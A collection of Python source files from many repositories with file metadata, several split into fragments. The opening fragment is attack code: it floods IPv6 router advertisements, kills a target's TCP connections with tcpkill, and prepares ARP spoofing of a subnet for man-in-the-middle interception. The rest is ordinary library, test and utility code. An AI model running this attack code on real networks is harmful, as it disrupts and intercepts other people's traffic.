scantype="-sn" #basic ping scan
if not(results.timeout=="none"):
timeout="timeout "+results.timeout+"s "
print "\n\nTimeout set for seconds:"+results.timeout
else:
timeout=""
if(results.scan):
ipaddr=str(results.scan)
if(results.arpscan): ##BETA TEST
res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr))
output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%")))
file=open("arpscan.txt","a")
print output
file.write(output)
file.close()
else:
print ipaddr
if(results.syn):
scantype="-sS -O" #syn and
if(results.service):
scantype=scantype+" -sV"
scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html
print scancmd
print os.popen(scancmd).read() #ping scan to know online hosts
if(results.ipv6ra):
minutes=results.ipv6ra
print "running for minutes: "+minutes
#run ipv6 RA flooding for N minutes
i=0
while (i <= minutes):
print "Firing RAs everywhere"
a = IPv6()
a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast)
a.display()
b = ICMPv6ND_RA()
b.display()
c = ICMPv6NDOptSrcLLAddr()
c.lladdr = "00:50:56:24:3b:c0" #MAC
c.display()
d = ICMPv6NDOptMTU()
d.display()
e = ICMPv6NDOptPrefixInfo()
e.prefixlen = 64
randomhex=hex(random.randint(0, 16777215))[2:].upper()
prefix=randomhex[:4]
e.prefix = prefix+"::" #Global Prefix
e.display()
send(a/b/c/d/e) # Send the packet
print "Sending IPv6 RA Packet :)"
time.sleep(1)
i=i+1
print i
if not(results.denytcp=="none"): #Works if you are the gateway or during MITM
target=results.denytcp
os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &")
#deny tcp traffic
if not(results.mitmall=="none"): #Most efficent way to arpspoof subnet
ipnet=results.mitmall
iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read()
iplist=iplist.split()
dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
dg
|
mbudiu-vmw/hiero
|
data/metadata/differential-privacy/data/ontime_private/gen_metadata.py
|
Python
|
apache-2.0
| 3,456
| 0.005498
|
#!/usr/bin/env python3
# Copyright (c) 2020 VMware Inc. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import itertools
import string
infile = '../../../../ontime_private/short.schema'
states = [ "AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS",
"KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM",
"NV", "NY", "OH", "OK", "OR", "PA", "PR", "RI", "SC", "SD", "TN", "TT", "TX", "UT", "VA", "VT",
"WA", "WI", "WV", "WY" ]
carriers = ["9E", "AA", "AS", "B6", "CO", "DH", "DL", "EV", "F9", "FL", "G4", "GA", "HP", "KH", "MQ", "NK",
"NW", "OH", "OO", "TW", "TZ", "UA", "US", "VX", "WN", "XE", "YV", "YX"]
def get_metadata(cn):
if cn == "DayOfWeek":
(g, gMin, gMax) = (1, 1, 7)
elif cn == "DepTime" or cn == "ArrTime":
(g, gMin, gMax) = (5, 0, 240
|
0)
elif cn == "DepDelay" or cn == "ArrDelay":
(g, gMin, gMax) = (1, -100, 10
|
00)
elif cn == "Cancelled":
(g, gMin, gMax) = (1, 0, 1)
elif cn == "ActualElapsedTime":
(g, gMin, gMax) = (1, 15, 800)
elif cn == "Distance":
(g, gMin, gMax) = (10, 0, 5100)
elif cn == "FlightDate":
# cluster values: (86400000, 852076800000, 1561852800000)
# 2017 values: (86400000, 1483286400000, 1514736000000)
# 2016 values, 2 months: (86400000, 1451635200000, 1456732800000)
(g, gMin, gMax) = (86400000, 1451635200000, 1456732800000)
else:
raise Exception("Unexpected column " + cn)
return {'type': "DoubleColumnQuantization",
'granularity': g,
'globalMin': gMin,
'globalMax': gMax}
def get_string_metadata(col):
letters = list(string.ascii_uppercase)
if col == "OriginState" or col == "DestState":
letters = states
elif col == "UniqueCarrier":
letters = carriers
return {'type': "StringColumnQuantization",
'globalMax': 'a',
'leftBoundaries': letters }
def main():
colnames = []
with open(infile, 'r') as f:
contents = "".join(line for line in f)
schema = json.loads(contents)
colnames = map(lambda s: s["name"], schema)
length2 = itertools.combinations(colnames, 2)
length2 = [sorted(x) for x in length2]
with open('privacy_metadata.json', 'w') as f:
quantization = {}
defaultEpsilons = { "0": 1, "1": 1, "2": .1 }
for col in schema:
cn = col["name"]
if col["kind"] == "String":
quantization[cn] = get_string_metadata(cn)
else:
quantization[cn] = get_metadata(cn)
output = {'epsilons': {}, 'defaultEpsilons': defaultEpsilons, 'quantization': { 'quantization': quantization } }
f.write(json.dumps(output))
if __name__=='__main__':
main()
|
thehub/hubplus
|
scripts/patch_ref_creator_field.py
|
Python
|
gpl-3.0
| 267
| 0.011236
|
from apps.plus_permissions.default_
|
agents import get_admin_user
from apps.plus_permissions.models import GenericReference
def
|
patch():
for ref in GenericReference.objects.filter(creator=None):
ref.creator = get_admin_user()
ref.save()
patch()
|
aronsky/home-assistant
|
homeassistant/components/hassio/websocket_api.py
|
Python
|
apache-2.0
| 3,538
| 0
|
"""Websocekt API handlers for the hassio integration."""
import logging
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.core import HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from .const import (
ATTR_DATA,
ATTR_ENDPOINT,
ATTR_METHOD,
ATTR_RESULT,
ATTR_TIMEOUT,
ATTR_WS_EVENT,
DOMAIN,
EVENT_SUPERVISOR_EVENT,
WS_ID,
WS_TYPE,
WS_TYPE_API,
WS_TYPE_EVENT,
WS_TYPE_SUBSCRIBE,
)
from .handler import HassIO
SCHEMA_WEBSOCKET_EVENT = vol.Schema(
{vol.Required(ATTR_WS_EVENT): cv.string},
extra=vol.ALLOW_EXTRA,
)
_LOGGER: logging.Logger = logging.getLogger(__package__)
@callback
def async_load_websocket_api(hass: HomeAssistant):
"""Set up the websocket API."""
websocket_api.async_register_command(hass, websocket_supervisor_event)
websocket_api.async_register_command(hass, websocket_supervisor_api)
websocket_api.async_register_command(hass, websocket_subscribe)
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command({vol.Required(WS_TYPE): WS_TYPE_SUBSCRIBE})
async def websocket_subscribe(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Subscribe to supervisor events."""
@callback
def forward_messages(data):
"""Forward events to websocket."""
connection.send_message(websocket_api.event_message(msg[WS_ID], data))
connection.subscriptions[msg[WS_ID]] = async_dispatcher_connect(
hass, EVENT_SUPERVISOR_EVENT, forward_messages
)
connection.send_message(websocket_api.result_message(msg[WS_ID]))
@websocket_api.async_response
@websocket_api.websocket_command(
{
vol.Required(WS_TYPE): WS_TYPE_EVENT,
vol.Required(ATTR_DATA): SCHEMA_WEBSOCKET_EVENT,
}
)
async def websocket_supervisor_event(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Publish events from the Supervisor."""
async_dispatcher_send(hass, EVENT_SUPERVISOR_EVENT, msg[ATTR_DATA])
connection.send_result(msg[WS_ID])
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command(
{
vol.Required(WS_TYPE): WS_TYPE_API,
vol.Required(ATTR_ENDPOINT): cv.string,
vol.Required(ATTR_METHOD): cv.string,
vol.Optional(ATTR_DATA): dict,
vol.Optional(ATTR_TIMEOUT): vol.Any(cv.Number, None),
}
)
async def websocket_supervisor_api(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Websocket handler to call Supervisor API."""
supervisor: HassIO = hass.data[DOMAIN]
try:
result = await supervisor.send_command(
msg[ATTR_ENDPOINT],
method=msg[ATTR_METHOD],
|
timeout=msg.get(ATTR_TIMEOUT, 10),
payload=msg.get(ATTR_DATA, {}),
)
if result.get(ATTR_RESULT) == "error":
raise hass.components.hassio.HassioAPIError(result.get("message"))
except hass.components.hassio.HassioAPIError as err:
_LOGGER.error("Failed to to call %s - %s", msg[ATTR_ENDPOINT], err)
connection.send_error(
msg[WS_ID], code=websocket_api.ERR_UNKNOWN_ERROR, mes
|
sage=str(err)
)
else:
connection.send_result(msg[WS_ID], result.get(ATTR_DATA, {}))
|
bokeh/bokeh
|
tests/unit/bokeh/protocol/test_receiver.py
|
Python
|
bsd-3-clause
| 5,417
| 0.00683
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh.core.serialization import Buffer
from bokeh.core.types import ID
from bokeh.protocol import Protocol
from bokeh.protocol.exceptions import ValidationError
# Module under test
from bokeh.protocol import receiver # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
proto = Protocol()
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_creation() -> None:
receiver.Receiver(None)
async def test_validation_success() -> None:
msg = proto.create('ACK')
r = receiver.Receiver(proto)
partial = await r.consume(msg.header_json)
assert partial is None
partial = await r.consume(msg.metadata_json)
assert partial is None
partial = await r.consume(msg.content_json)
assert partial is not None
assert partial.msgtype == msg.msgtype
assert partial.header == msg.header
assert partial.content == msg.content
assert partial.metadata == msg.metadata
async def test_validation_success_with_one_buffer() -> None:
r = receiver.Receiver(proto)
partial = await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
assert partial is None
partial = await r.consume('{}')
assert partial is None
partial = await r.consume('{"bar": 10}')
assert partial is None
partial = await r.consume('{"id": "buf_header"}')
assert partial is None
partial = await r.consume(b'payload')
assert partial is not None
assert partial.msgtype == "PATCH-DOC"
assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}
assert partial.content == {"bar":10}
assert partial.metadata == {}
assert partial.buffers == [Buffer(ID("buf_header"), b"payload")]
async def test_multiple_validation_success_
|
with_multiple_bu
|
ffers() -> None:
r = receiver.Receiver(proto)
for N in range(10):
partial = await r.consume(f'{{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":{N}}}')
partial = await r.consume('{}')
partial = await r.consume('{"bar": 10}')
for i in range(N):
partial = await r.consume(f'{{"id": "header{i}"}}')
partial = await r.consume(f'payload{i}'.encode())
assert partial is not None
assert partial.msgtype == "PATCH-DOC"
assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers": N}
assert partial.content == {"bar":10}
assert partial.metadata == {}
for i in range(N):
assert partial.buffers[i] == Buffer(ID(f"header{i}"), f"payload{i}".encode())
async def test_binary_header_raises_error() -> None:
r = receiver.Receiver(proto)
with pytest.raises(ValidationError):
await r.consume(b'{"msgtype": "PATCH-DOC", "msgid": "10"}')
async def test_binary_metadata_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
with pytest.raises(ValidationError):
await r.consume(b'metadata')
async def test_binary_content_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
await r.consume('metadata')
with pytest.raises(ValidationError):
await r.consume(b'content')
async def test_binary_payload_header_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
await r.consume('{}')
await r.consume('{}')
with pytest.raises(ValidationError):
await r.consume(b'{"id": "buf_header"}')
async def test_text_payload_buffer_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
await r.consume('{}')
await r.consume('{}')
await r.consume('{"id": "buf_header"}')
with pytest.raises(ValidationError):
await r.consume('buf_payload')
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
atheendra/access_keys
|
keystone/token/providers/uuid.py
|
Python
|
apache-2.0
| 929
| 0
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Keystone UUID Token Provider"""
from __future__ import absolute_import
import uuid
|
from keystone.token.providers import common
class Provider(common.BaseProvider):
def
|
__init__(self, *args, **kwargs):
super(Provider, self).__init__(*args, **kwargs)
def _get_token_id(self, token_data):
return uuid.uuid4().hex
|
rybesh/pybtex
|
pybtex/backends/html.py
|
Python
|
mit
| 2,255
| 0.002661
|
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
|
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from xml.sax.saxutils import escape
from pybtex.backends import BaseBackend
import pybt
|
ex.io
file_extension = 'html'
PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><meta name="generator" content="Pybtex">
<meta http-equiv="Content-Type" content="text/html; charset=%s">
<title>Bibliography</title>
</head>
<body>
<dl>
"""
class Backend(BaseBackend):
name = 'html'
suffixes = '.html',
symbols = {
'ndash': u'–',
'newblock': u'\n',
'nbsp': u' '
}
tags = {
'emph': u'em',
}
def format_text(self, text):
return escape(text)
def format_tag(self, tag_name, text):
tag = self.tags[tag_name]
return ur'<%s>%s</%s>' % (tag, text, tag)
def write_prologue(self, maxlen):
encoding = self.encoding or pybtex.io.get_default_encoding()
self.output(PROLOGUE % encoding)
def write_epilogue(self):
self.output(u'</dl></body></html>\n')
def write_entry(self, key, label, text):
self.output(u'<dt>%s</dt>\n' % label)
self.output(u'<dd>%s</dd>\n' % text)
|
hkjallbring/pusher-http-python
|
pusher/util.py
|
Python
|
mit
| 1,209
| 0.014888
|
# -*- coding: utf-8 -*-
from __future__ import (print_function, unicode_literals, absolute_import,
division)
import json
import re
import six
import sys
channel_name_re = re.compile('\A[-a-zA-Z0-9_=@,.;
|
]+\Z')
app_id_re = re.compile('\A[0-9]+\Z')
pusher_url_re = re.compile('\A(http|https)://(.*):(.*)@(.*)/apps/([0-9]+)\Z')
socket_id_re = re.compile('\A\d+\.\d+\Z')
if sys.version_info < (3,):
text = 'a unicode string'
else:
text = 'a string'
def ensure_text(obj, name):
if isinstance(obj, six.text_type):
retur
|
n obj
if isinstance(obj, six.string_types):
return six.text_type(obj)
raise TypeError("%s should be %s" % (name, text))
def validate_channel(channel):
channel = ensure_text(channel, "channel")
if len(channel) > 200:
raise ValueError("Channel too long: %s" % channel)
if not channel_name_re.match(channel):
raise ValueError("Invalid Channel: %s" % channel)
return channel
def validate_socket_id(socket_id):
socket_id = ensure_text(socket_id, "socket_id")
if not socket_id_re.match(socket_id):
raise ValueError("Invalid socket ID: %s" % socket_id)
return socket_id
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.2/Lib/test/test_sys.py
|
Python
|
mit
| 32,006
| 0.001843
|
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
|
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqu
|
al(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
# test that stderr buffer if flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
|
nkripper/pynet
|
week1/json_intro_read.py
|
Python
|
apache-2.0
| 111
| 0.018018
|
#!/us
|
r/bin/python
im
|
port json
with open("test_json.json","r") as f:
new_list = json.load(f)
print new_list
|
mbareta/edx-platform-ft
|
lms/djangoapps/ccx/migrations/0009_auto_20170608_0525.py
|
Python
|
agpl-3.0
| 735
| 0.002721
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
d
|
ependencies = [
('ccx', '0008_auto_20170523_0630'),
|
]
operations = [
migrations.AlterField(
model_name='customcourseforedx',
name='delivery_mode',
field=models.CharField(default=b'IN_PERSON', max_length=255, choices=[(b'IN_PERSON', b'In Person'), (b'ONLINE_ONLY', b'Online')]),
),
migrations.AlterField(
model_name='customcourseforedx',
name='time',
field=models.DateTimeField(default=datetime.datetime(2017, 6, 8, 5, 24, 53, 908103)),
),
]
|
sosey/ginga
|
ginga/misc/Datasrc.py
|
Python
|
bsd-3-clause
| 3,565
| 0.001964
|
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import threading
class TimeoutError(Exception):
pass
class Datasrc(object):
def __init__(self, length=0):
self.length = length
self.cursor = -1
self.datums = {}
self.history = []
self.sortedkeys = []
self.cond = threading.Condition()
self.newdata = threading.Event()
def __getitem__(self, key):
with self.cond:
return self.datums[key]
def __setitem__(self, key, value):
self.push(key, value)
def __contains__(self, key):
with self.cond:
return key in self.datums
def has_key(self, key):
with self.cond:
return key in self.datums
def __delitem__(self, key):
self.remove(key)
def __len__(self):
with self.cond:
return len(self.history)
def push(self, key, value):
with self.cond:
if key in self.history:
self.history.remove(key)
self.history.append(key)
self.datums[key] = value
self._eject_old()
self.newdata.set()
self.cond.notify()
def pop_one(self):
return self.remove(self.history[0])
def pop(self, *args):
if len(args) == 0:
return self.remove(self.history[0])
assert len(args) == 1, \
ValueError("Too many parameters to pop()")
return self.remove(args[0])
def remove(self, key):
with self.cond:
val = self.datums[key]
self.history.remove(key)
del self.datums[key]
self.sortedkeys = list(self.datums.keys())
self.sortedkeys.sort()
return val
def _eject_old(self):
if (self.length is None) or (self.length <= 0):
# no limit
return
while len(self.history) > self.length:
oldest = self.history.pop(0)
del self.datums[oldest]
self.sortedkeys = list(self.datums.keys())
self.sortedkeys.sort()
def index(self, key):
with self.cond:
return self.history.index(key)
def index2key(self, index):
with self.cond:
return self.history[index]
def index2value(self, index):
with self.cond:
return self.datums[self.history[index]]
def youngest(self):
return self.datums[self.history[-1]]
def oldest(self):
return self.datums[self.history[0]]
def pop_oldest(self):
return self.pop(self.history[0])
def pop_youngest(self):
return self.pop(self.history[-1])
def keys(self, sort='alpha'):
with self.cond:
if sort == 'alpha':
return self.sortedkeys
elif sort == 'time':
return self.history
else:
return self.datums.keys()
def wait(self, timeout=None):
with self.cond:
self.cond.wait(timeout=timeout)
|
if not self.newdata.isSet():
|
raise TimeoutError("Timed out waiting for datum")
self.newdata.clear()
return self.history[-1]
def get_bufsize(self):
with self.cond:
return self.length
def set_bufsize(self, length):
with self.cond:
self.length = length
self._eject_old()
#END
|
allure-framework/allure-python
|
allure-pytest/test/acceptance/attachment/attachment_step_test.py
|
Python
|
apache-2.0
| 622
| 0
|
""" ./examples/attachment/attachment_step.rst """
from hamcrest import assert_that
from allure_commons_test.report i
|
mport has_test_case
from allure_commons_test.result import has_step
from allure_commons_test.result import has_attachment
def test_step_with_attachment(executed_docstring_path):
assert_that(executed_docstring_path.allure_report,
has_test_case("test_step_with_attachment",
has_step
|
("step_with_attachment",
has_attachment()
),
)
)
|
keflavich/agpy
|
agpy/showspec.py
|
Python
|
mit
| 51,670
| 0.020302
|
"""
showspec is my homegrown spectrum plotter, meant to somewhat follow STARLINK's
SPLAT and have functionality similar to GAIA, but with an emphasis on producing
publication-quality plots (which, while splat may do, it does unreproducibly)
.. todo::
-add spectrum arithmetic tools
(as is, you can use numpy.interp with sp.vind and sp.spectrum pretty
easily)
-implement other fitters
-e.g., NH3 hyperfine, Voigt
-move to object-oriented pylab/pyplot implementation (for bulk / speedup work)
-allow for non-plotting fitting work (curious... I've never needed that yet)
-Equivalent Width measurement without gaussian fitting
-probably should be part of the baseline code
-write documentation other people can read
12/21/2011 - ALL of the above to do is IS DONE! It's now hosted at <http://pyspeckit.bitbucket.org>
"""
import math
import pylab
from pylab import *
for k,v in pylab.__dict__.iteritems():
if hasattr(v,'__module__'):
if v.__module__ is None:
locals()[k].__module__ = 'pylab'
import matplotlib
from agpy.mpfit import mpfit
from collapse_gaussfit import *
from ratosexagesimal import *
import pyfits
import gaussfitter
import numpy
from numpy import isnan
from mad import MAD,nanmedian
def steppify(arr,isX=False,interval=0,sign=+1.0):
"""
*support function*
Converts an array to double-length for step plotting
"""
if isX and interval==0:
interval = numpy.abs(arr[1]-arr[0]) / 2.0
newarr = pylab.array(zip(arr-sign*interval,arr+sign*interval)).ravel()
return newarr
class SpecPlotter:
"""
SpecPlotter class. Takes in a spectrum or data cube, plotting properties,
and a velocity axis determination function. Look at splat_1d for a wrapper
that might actually be useful.
Whew, needs more documentation
"""
def __init__(self, cube, axis=None, xtol=None, ytol=None, vconv=lambda
x: x, xtora=lambda x: x, ytodec=lambda x: x, specname=None,
dv=None, color='k', hdr=None, errspec=None, maskspec=None,
fig=None, fignum=1, clear=True, title=None, xunits='km/s',
erralpha=0.2, ivconv=None, autorefresh=True, reffreq=None,
gaiafignum=0, gaiafig=None, clickid=None, **kwargs ):
self.vconv = vconv
self.xtora = xtora
self.ytodec = ytodec
self.cube = cube # where(numpy.isnan(cube),0,cube)
if len(self.cube.shape) > 1:
self.spectrum = cube[:,0,0] # spectrum is what's plotted; cube is the "raw data"
else:
self.spectrum = cube # spectrum is what's plotted; cube is the "raw data"
self.specname=specname
self.dv=dv
self.reffreq=reffreq
self.scale=1.0
self.units='K'
self.xunits=xunits
self.voff=0.0
self.offset=0.0
self.continuum=0.0
self.errspec = errspec
self.erralpha=erralpha
self.plotcolor=color
self.specfit = Specfit(self)
self.fitspec = self.specfit
self.baseline = Baseline(self)
#self.fft = FFT(self)
#self.psd = self.fft.psd
self.vmin=None
self.vmax=None
self.title=title
self.ivconv=ivconv
self.autorefresh=autorefresh
self.spectrumplot=None
self.errorplot=None
self.gaiafignum = gaiafignum
self.gaiafig = gaiafig
self.clickid = clickid
self.plotkwargs = kwargs
if maskspec is not None:
self.maskspec = maskspec
else:
self.maskspec = zeros(self.cube.shape)
self.linecollections =[]
self.texts =[]
if hdr: self.header = hdr
# figure out where to put the plot
if fig is None and axis is None:
fig=figure(fignum)
if clear: fig.clf()
self.axis = fig.gca()
elif fig is None and axis is None:
self.axis = pylab.gca()
elif fig is not None and axis is None:
if clear: fig.clf()
self.axis = fig.gca()
elif fig is None and axis is not None:
self.axis = axis
else: # if figure and axis are both set, just use axis
self.axis = axis
if clear: self.axis.clear()
def __call__(self, event):
"""
Connects map cube to specplotter...
"""
if event.inaxes:
clickX = event.xdata
